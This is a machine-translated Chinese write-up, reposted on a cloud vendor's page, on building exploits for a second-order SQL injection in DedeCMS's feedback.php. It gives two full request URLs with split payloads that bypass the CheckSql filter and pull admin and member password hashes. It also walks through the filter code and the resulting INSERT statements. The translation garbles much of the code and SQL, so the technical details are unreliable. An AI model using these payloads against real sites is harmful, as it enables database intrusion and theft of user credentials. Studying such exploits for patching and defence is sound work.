Dedecms second injection classic exp Structure

Source: Internet
Author: User

0x01 PrefaceLong long ago, yy@safekeyer.com found that dedecms second injection of a classic code audit in the secondary attack case, but limited to the field size cannot exceed 60 bytes and appear relatively chicken, under the collective wisdom of safekeyer, we found two ways to break through. This article focuses on the exp structure, such as detailed vulnerability analysis, please see: http://www.wooyun.org/bugs/wooyun-2010-0185620x02 Method 1: Direct shorteningTheory: insert --> select --> insert --> select Exp: (red indicates key data) First insert http://www.bkjia.com /Dede/plus/feedback. php? Action = send & comtype = comments & aid = 1 & isconfirm = yes & cmtuser = admin & msg = asfsafsdaf & face = 6 & validate = slep & title = 1 ', "'", 8, (select pwd from % 23 @__ admin )) % 23 & sbbt = % E5 % 8F % 91% E9 % 80% 81% E8 % AF % 84% E8 % AE % BA Second insert http://127.0.0.1/dede/plus/feedback.php ? Action = send & comtype = reply & fid = 27 & isconfirm = yes & cmtuser = admin & msg = asfsafsdaf & face = 6 & validate = angr & title = 1 & sbbt = % E5 % 8F % 91% E9 % 80% 81% E8 % AF % 84% E8 % AE % BA shows that the first insert payload is: 1', "'", 8, (select pwd from % 23 @__ admin) % 23 Database: returned result: bypassing specific code analysis: 01 function CheckSql ($ db_string, $ querytype = 'select') 02 {03 · (omitted here) 04 while (TRUE) 05 {06 $ pos = strpos ($ db_string, '\ '', $ pos + 1); 07 if ($ Pos = FALSE) 08 {09 break; 10} 11 $ clean. = substr ($ db_string, $ old_pos, $ pos-$ old_pos); 12 while (TRUE) 13 {14 $ pos1 = strpos ($ db_string ,'\'', $ pos + 1); 15 $ pos2 = strpos ($ db_string, '\', $ pos + 1); 16 if ($ pos1 = FALSE) 17 {18 break; 19} 20 elseif ($ pos2 = FALSE | $ pos2> $ pos1) 21 {22 $ pos = $ pos1; 23 break; 24} 25 $ pos = $ pos2 + 1; 26} 27 $ clean. = '$ s $'; 28 $ old_pos = $ p OS + 1; 29} 30 $ clean. = substr ($ db_string, $ old_pos); 31 // echo $ clean; exit (); 32 $ clean = trim (strtolower (preg_replace (array ('~ \ S ++ ~ S '), array (''), $ clean); 33 · (omitted here) 34} The above detection code is used to replace the SQL statement with the content between the two quotation marks $ s $ for the second insert: INSERT INTO 'dede _ feedback' ('aid ', 'typeid', 'username', 'artitle', 'IP', 'ischeck', 'dtime', 'mid ', 'bad', 'good', 'ftype ', 'face', 'msg ') VALUES ('1', '0', 'test', '1', "'", 8, (select pwd from dede_admin) # ',' 127. 0.0.1 ', '1', '000000', '2', '0', '0', 'feedback', '6', 'asfsafsdaf: insert into 'dede _ feed Back '('aid', 'typeid', 'username', 'artitle', 'IP', 'ischeck', 'dtime', 'mid ', 'bad ', 'Good', 'ftype', 'face', 'msg ') VALUES ($ s $, $ s $, "$ s $, $ s $, $ s $) then function CheckSql ($ db_string, $ querytype = 'select') has to detect bypassing. The focus is on the processing of single quotes. Single quotes are enclosed in single quotes. Single quotes are used as strings. Single quotes play an important role in bypassing the injection detection, and make it unable to play single quotes in the complete insert operation, only as a string.0x03 Method 2: Two inserts are validTheory: insert --> select --> insert --> select Exp: (red indicates key data) First insert http://127.0.0.1/dede/plus/feedback.php ? Action = send & comtype = comments & aid = 1 & isconfirm = yes & cmtuser = admin & msg = asfsafsdaf & face = 6 & validate = slep & title = 1 ', (char (@ '''),/* & sbbt = % E5 % 8F % 91% E9 % 80% 81% E8 % AF % 84% E8 % AE % BA Second insert http://127.0.0.1/dede/plus/feedback.php ? Aid = 1 & action = send & comtype = reply & fid = 48 & isconfirm = yes & validate = craf & msg = */1, 2, 4, 5, 6, 7, (select/**/concat (userid, 0x3a, pwd)/**/from/**/dede_member/**/limit/**/1 )) % 23 insert different parts of payload into the database through two insert operations, and then combine them into a complete payload. The first insert: 1', (char (@''')), /* Second insert: */1, 2, 3, 4, 5, 6, 7, (select/**/concat (userid, 0x3a, pwd) /**/from/**/dede_member/**/limit/**/1) % 23: insert into 'dede _ feedback' ('aid ', 'typeid', 'U Sername', 'artitle', 'IP', 'ischeck', 'dtime', 'mid ', 'bad', 'good', 'ftype', 'face ', 'msg ') VALUES ('1', '0', 'test', '1', (char (@ ''''),/*', '127. 0.0.1 ', '1', '000000', '2', '0', '0', 'feedback', '0 ','@'\''*/, 2, 3, 4, 5, 6, 7, 8, (selectconcat (userid, 0x7c, pwd) fromde_admin) ') after anti-injection function processing: insert into 'dede _ feedback' ('aid ', 'typeid', 'username', 'artitle', 'IP', 'ischeck', 'dtime', 'mid ', 'bad', 'good', 'ftype ', 'face', 'msg ') valu Es ($ s $, $ s $, (char (@ '$ s $, $ s $, $ s $, $ s $. Database: returned results:0x03 conclusionIf you have any errors, you may wish to correct them. If you have any suggestions, you may wish to discuss them.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.